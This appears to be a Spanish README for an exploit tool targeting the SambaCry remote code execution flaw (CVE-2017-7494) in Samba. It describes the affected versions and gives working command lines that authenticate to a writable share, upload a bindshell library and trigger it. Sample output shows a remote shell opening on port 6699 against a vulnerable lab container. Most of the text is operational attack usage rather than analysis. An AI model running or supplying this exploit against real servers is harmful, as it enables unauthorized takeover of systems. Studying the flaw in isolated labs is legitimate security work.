
Exploit de SambaCry (CVE-2017-7494)
Samba es una reimplementación de software libre del protocolo de red SMB/CIFS. Samba proporciona servicios de archivos e impresión para diversos clientes de Microsoft Windows y puede integrarse con un dominio de Microsoft Windows Server, ya sea como Controlador de Dominio (DC) o como miembro del dominio. A partir de la versión 4, es compatible con Active Directory y dominios de Microsoft Windows NT.
Samba en la versión 4.5.9 y anteriores es vulnerable a una vulnerabilidad de ejecución remota de código llamada SambaCry. CVE-2017-7494 permite a usuarios autenticados remotos subir una biblioteca compartida a una carpeta compartida con permiso de escritura y realizar ataques de ejecución de código para tomar el control de servidores que ejecutan servicios Samba vulnerables.
Samba 3.x posterior a 3.5.0 y 4.x anterior a 4.4.14, 4.5.x anterior a 4.5.10 y 4.6.x anterior a 4.6.4 no restringe la ruta de archivo al usar named pipes de Windows, lo que permite a usuarios autenticados remotos subir una biblioteca compartida a una carpeta compartida con permiso de escritura y ejecutar código arbitrario mediante un named pipe manipulado.
Usa poetry para configurar el entorno para este exploit
pip3 install -r requirements.txt
Después puedes ejecutarlo de la siguiente manera:
./exploit -t <target> -e libbindshell-samba.so \
-s <share> -r <location>/libbindshell-samba.so \
-u <user> -p <password> -P 6699
Por ejemplo, si usas la imagen vulnerable de vulnerables/cve-2017-7494 y quieres ejecutar este exploit contra ella:
./exploit -t <target> -e libbindshell-samba.so \
-s data -r /data/libbindshell-samba.so \
-u sambacry -p nosambanocry -P 6699
Y obtendrás la siguiente salida:
./exploit -t <target> -e libbindshell-samba.so \
-s data -r /data/libbindshell-samba.so \
-u sambacry -p nosambanocry -P 6699
[*] Starting the exploit
[+] Authentication ok, we are in !
[+] Preparing the exploit
[+] Exploit trigger running in background, checking our shell
[+] Connecting to 10.1.1.5 at 6699
[+] Veryfying your shell...
Linux 7a4b8023575a 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u1 (2017-02-22) x86_64 GNU/Linux
>>
La carga útil de este proyecto, junto con el código, se inspiró en gran medida en opsxcq/exploit-CVE-2017-7494.